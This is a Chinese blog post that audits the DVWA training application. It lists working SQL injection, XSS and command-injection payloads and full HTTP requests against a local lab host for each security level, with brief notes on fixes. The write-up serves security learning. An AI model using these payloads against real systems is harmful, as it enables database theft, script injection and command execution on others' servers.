4、DVWA代码审计(1)

最新推荐文章于 2024-05-18 16:14:38 发布
最新推荐文章于 2024-05-18 16:14:38 发布
阅读量482 收藏 9
点赞数 6
分类专栏: php代码审计(一) 文章标签: php 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/136419820
版权

一、SQL注入

1、sql注入(low)

限制

闭合单引号

复现

GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=low
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

2、sql注入(medium中等)

限制

复现

POST /vulnerabilities/sqli/ HTTP/1.1
Host: ddd.com
Content-Length: 163
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=medium
Connection: close

id=-1 UNION ALL SELECT NULL,CONCAT(0x71627a7871,0x6e654d4a796e5757656548414256767a6c7657736b57584454496a61644a4d587a47566a476b4f45,0x7171716b71)-- -&&Submit=Submit

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

有函数过滤但还能并没有触碰限制

在这里插入图片描述

3、sql注入(高级)

限制

闭合单引号

复现

请求 URL: http://ddd.com/vulnerabilities/sqli/
请求方法: GET
状态代码: 200 OK
远程地址: 127.0.0.1:80
引用者策略: strict-origin-when-cross-origin
Cache-Control: no-cache, must-revalidate
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Date: Tue, 04 Apr 2023 07:22:55 GMT
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Keep-Alive: timeout=5, max=99
Pragma: no-cache
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
Transfer-Encoding: chunked
X-Powered-By: PHP/7.3.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=eibl06n2nhgeuahjf753n5heir; security=high
Host: ddd.com
Referer: http://ddd.com/vulnerabilities/sqli/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

4、sql注入(低级盲注)

限制

闭合单引号

复现

GET /vulnerabilities/sqli_blind/?id=1+%27or+sleep%282%29%23&Submit=Submit HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli_blind/?id=1+%27or+1%3D1%23&Submit=Submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=low
Connection: close



1 'and length(database())=4#
1' and substr(database(),1,1)='d'#

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

5、sql注入(中级盲注)

限制

复现

POST /vulnerabilities/sqli_blind/ HTTP/1.1
Host: ddd.com
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli_blind/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=medium
Connection: close

id=2 and length(database())=4#&Submit=Submit

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

6、sql注入(高级盲注)

限制

复现

GET /vulnerabilities/sqli_blind/ HTTP/1.1
Host: ddd.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/sqli_blind/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: id=1+%27and+sleep(3)%23; PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=high
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

二、XSS

1、xss(dom低)

限制

复现

GET /vulnerabilities/xss_d/?default=%3Cscript%3Ealert(111)%3C/script%3E HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jinqklehngsck6n4rn43r29hn6; security=low
Connection: close

在这里插入图片描述

代码

在这里插入图片描述

修复

删除前端解码函数

在这里插入图片描述

2、xss(dom中)

限制

过滤:<script

复现

具体请求:
本质思路就是通过闭合原本的标签,使得恶意xss的payload逃逸出来

GET /vulnerabilities/xss_d/?default=French111%3C/option%3E%3C/select%3E%3Cimg%20src=%27x%27%20onerror=%27alert(1)%27%3E HTTP/1.1
Host: aaa.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5hhvrpfgm7eb7oql6ahkqfke2u; security=medium
Connection: close

在这里插入图片描述

代码

此地的限制就是检测到传入script标签,就直接跳转到指定的地址:
?default=English

在这里插入图片描述

修复

~此地可以直接通过去掉前端的解码函数解决
~也可以直接在vulnerabilities/xss_d/source/medium.php增加白名单,下一关就是对此思路的绕过
对传入default参数不是指定的4种语言就直接默认跳转
删除前端解码函数

在这里插入图片描述

3、xss(dom高)

限制

复现

payload:English#<script>alert('xss')</script>

GET /vulnerabilities/xss_d/?default=English HTTP/1.1
Host: ddd.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=high
Connection: close

在这里插入图片描述

代码

在这里插入图片描述
在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

4、xss(反射型低)

限制

复现

<h1>bbb</h1>
<script>alert(111)</script>

GET /vulnerabilities/xss_r/?name=%3Ch1%3Ebbb%3C%2Fh1%3E HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_r/?name=e
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

5、xss(反射型中)

限制

复现

<img src=x onerror=alert('XSS')>

GET /vulnerabilities/xss_r/?name=%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3E HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_r/?name=%3Ch1%3Ebbb%3C%2Fh1%3E
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=medium
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

6、xss(反射型高)

限制

复现

payload:<img src=x onerror=alert('XSS')>

GET /vulnerabilities/xss_r/?name=%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3E HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_r/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=high
Connection: close

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

最高级(impossible)

将获取的名字变量进行了编码

在这里插入图片描述

7、xss(存储型低)

限制

复现

payload:<script>alert(111)</script>

POST /vulnerabilities/xss_s/ HTTP/1.1
Host: ddd.com
Content-Length: 104
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_s/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close

txtName=%3Ch1%3EA%3C%2Fh1%3E&mtxMessage=%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&btnSign=Sign+Guestbook

在这里插入图片描述

代码

还使用了防注入的函数

在这里插入图片描述

修复

在这里插入图片描述

8、xss(存储型中)

限制

复现

payload: <img src='x' onerror='alert("XSS")'>

POST /vulnerabilities/xss_s/ HTTP/1.1
Host: ddd.com
Content-Length: 163
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_s/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=medium
Connection: close

txtName=%3Cimg+src%3D%27x%27+onerror%3D%27alert%28%22XSS%22%29%27%3E&mtxMessage=%3Cimg+src%3D%27x%27+onerror%3D%27alert%28%22XSS%22%29%27%3E&btnSign=Sign+Guestbook

在这里插入图片描述

代码

在这里插入图片描述

修复在这里插入图片描述

9、xss(存储型高)

限制

复现

payload:<img src='x' onerror='alert("XSS")'>

POST /vulnerabilities/xss_s/ HTTP/1.1
Host: ddd.com
Content-Length: 123
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/xss_s/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=high
Connection: close

txtName=%3Cimg+src%3D%27x%27+onerror%3D%27alert%28%22XSS%22%29%27%3E&mtxMessage=%3Ch1%3EA%3C%2Fh1%3E&btnSign=Sign+Guestbook

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

三、命令执行

1、命令执行(low)

限制

复现

payload:
● www.baidu.com&calc
● www.baidu.com|calc
● "\"baidu.com&calc"
● www.baidu.com&&calc

POST /vulnerabilities/exec/ HTTP/1.1
Host: ddd.com
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/exec/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close

ip=www.baidu.com%26calc&Submit=Submit

在这里插入图片描述

代码

在这里插入图片描述

修复

使用:escapeshellarg  和	 escapeshellcmd(推荐)   ,都可以修复

在这里插入图片描述

2、命令执行(medium)

限制

复现

payload:
● www.baidu.com&calc
● www.baidu.com|calc
● "\"baidu.com&calc"

POST /vulnerabilities/exec/ HTTP/1.1
Host: ddd.com
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/exec/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=medium
Connection: close

ip=www.baidu.com%26calc&Submit=Submit

在这里插入图片描述

代码

在这里插入图片描述

修复

使用:escapeshellarg  和	 escapeshellcmd(推荐)   ,都可以修复

在这里插入图片描述

3、命令执行(high)

限制

复现

payload:
● www.baidu.com|||calc

POST /vulnerabilities/exec/ HTTP/1.1
Host: ddd.com
Content-Length: 43
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/exec/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=high
Connection: close

ip=www.baidu.com%7C%7C%7Ccalc&Submit=Submit

在这里插入图片描述
在这里插入图片描述

代码

代码过滤了  | 和 || 。使用 ||| 绕过

在这里插入图片描述

修复

在这里插入图片描述

YINZHE_
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2018最新代码审计教程笔记-代码审计入门
DYBOY-程序开发&网络安全
12-29 7096
由于之前的学习不是非常的系统,故此重新整理学习“代码审计”,博客也更新相关内容。   0x01:调试函数 echo (print): 这是最简单的输出数据调试方法,一般用来输出变量值,或者你不确定程序执行 到了哪个分支的情况下是用。 print_r、var_dump(var_export)、debug_zval_dump 这个主要是用来输出变量数据值,特别是数组和对象数据,一般我们在查看
PHP-dvwa-高难度代码审计
10-08
PHP-dvwa-高难度代码审计
DVWA代码审计
weixin_44368248的博客
02-21 6049
目录 Brute Force爆破 Low Medium High Command Injection Low Medium High Csrf Low Medium High File Inclusion Low medium high File Upload Low Medium High SQL Injection Low Medium High Xss Low Medium High Brute Force爆破 Low 通过get方
DVWA代码审计--SQL注入
最新发布
余十步的博客
05-18 1209
此时如果比较操作符被过滤,上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了,需要注意的是分隔符不能为null,如果为null,则返回结果为null。通常含有这些函数substr(),mid(),limit(),的这些子句方法都需要使用到逗号,语法:concat_ws(separator, str1, str2, …使用greatest()、least():(前者返回最大值,后者返回最小值)同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找,
DVWA | 代码审计
一醉一休的博客
09-20 983
前言 描述   蛮力攻击可以通过许多不同的方式表现出来,但主要包括攻击者配置预定值,使用这些值向服务器发出请求,然后分析响应。为了提高效率,攻击者可以使用字典攻击(有或没有突变)或传统的暴力攻击(使用给定的字符类别,例如:字母数字、特殊、区分大小写(不))。考虑到给定的方法、尝试次数、进行攻击的系统的效率以及被攻击系统的估计效率,攻击者能够大致计算出提交所有选定的预定值需要多长时间 Low 1、传入两个参数,没有对参数作过多处理,然后进行数据库查询 2、 函数执行某个针对数据库的查询,若查询成功即返回tur
DVWA命令注入(Command Injection)漏洞代码审计
Libra10913的博客
06-11 568
DVWA命令注入(Command Injection)漏洞代码审计
代码审计DVWA—CSRF— Low
王嘟嘟的博客
10-30 410
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 说明 其实之前对CSRF都不是很了解。但是现在正好在做代码审计,所以还是要进行一个深入了解,希望自己可以很快的进步。 0x01 start 1.黑盒 也就是只要有Cookie,就可以执行任何操作。如果没有其他限制的话,就可以...
DVWA-1[1].0.7
07-19
- **代码审计**:通过源代码审查,我们可以学习如何识别和修复潜在的安全问题。 5. **应用价值** - **教育训练**:DVWA是Web安全教学的理想平台,适合初学者快速入门,也适用于专业人士持续提升技能。 - **企业...
DVWA-master.zip
03-21
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
DVWA的压缩文件安装包下载
09-30
1. **SQL注入**:DVWA中的"SQL Injection"模块让你体验如何通过构造恶意SQL语句来获取或篡改数据库信息。了解如何防止SQL注入对于任何Web开发者来说都是基础。 2. **跨站脚本攻击(XSS)**:DVWA包含"Cross Site ...
xampp与dvwa.rar
08-13
`dvwa`文件可能包含了DVWA的源代码或者安装文件,用户可以将其部署在XAMPP环境中,亲自实践如何发现和修复这些漏洞。通过DVWA,用户可以学习如何防止这些常见的攻击,提高自己的安全意识和技能。 在实际操作中,...
DVWA审计
旺仔Sec&blog
10-29 1780
[PHP 源码审计基础]DVWA 的分析与测试 下载地址:DVWA - Damn Vulnerable Web Application sql injection 源码审计 <?php if(isset( $_REQUEST['Submit'])){ // Get input $id = $_REQUEST['id']; // Check database $query = "SELECT fi...
代码审计DVWA _Command Injection (high)
m0_46390077的博客
11-21 41
查你现在用的电脑的系统信息,括号里可以放很多值来查询不同的系统信息,例如,‘s’是查询你的操作系统,'n'查询你的主机名称,‘r’查询你的版本。》中的“World”被替换成“Dolly”,所以输出是《Hello Dolly!此段代码我们检查是否已提交表单,方法是在 POST 变量中查找名为submit 的按钮。的数组,该数组包含应从 IP 地址中删除并在运行ping命令之前删除的字符列表。函数返回从字符串开始到第一个子串出现为止的部分,即 "He"。这部分的目的是根据不同的操作系统执行不同的ping命令。
代码审计DVWA_File Upload(impossible)
m0_46390077的博客
01-22 350
相匹配,则说明这次请求来自一个合法的、已验证身份的用户;如果不匹配,则可能表示请求无效或已被篡改,此时服务器可能会拒绝该请求,或者重定向至指定的URL,这里是指向。函数:这是一个自定义的函数,其目的是比较传入的两个token是否一致。函数后,所有大写字母被转换为相应的小写字母,因此变量。函数在PHP中用于获取图像文件的尺寸、类型等信息。函数在PHP中用于获取PHP配置选项当前的值。是 "Hello WoRLd",通过调用。用于将一个字符串中的所有字符转换为小写。的值变为 "hello world"。
DVWA1.9 (二) Command Injection代码审计
公羽向阳的博客
07-08 178
DVWA1.9 Command Injection代码审计
DVWA之CSRF代码审计
good good study
09-01 3415
目录 Low Medium High Impossible Low 如下,我们知道页面的功能一个有两个。一个是修改当前dvwa登录密码,一个是测试密码是否修改成功 我们可以看到low难度的源代码中,并没有添加token 且修改密码是通过get请求发送,该修改请求可以构造 即,存此存在csrf的原因为 发送修改密码的请求没有加token 后台无token验证,不能证明请求的唯一性与真实性 修改密码无旧密码验证 发送修改密码的请求数据容易被伪造 所以只要诱骗当前账户(...
DVWA 命令注入代码审计(High)
2302_79546589的博客
01-17 358
涉及到的函数:isset()、trim()、array_keys()、str_replace()、php_uname('s')、stristr()、
DVWA1.9 (三) CSRF代码审计
公羽向阳的博客
07-14 212
DVWA1.9 CSRF代码审计
dvwa代码执行漏洞
05-30
1. 首先,在DVWA中找到代码执行漏洞的页面。在DVWA中,通常可以在“File Inclusion”或“Command Injection”这些选项中找到相关漏洞。 2. 在输入框中输入以下内容: ``` ;ls ``` 这将在命令后添加一个分号,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值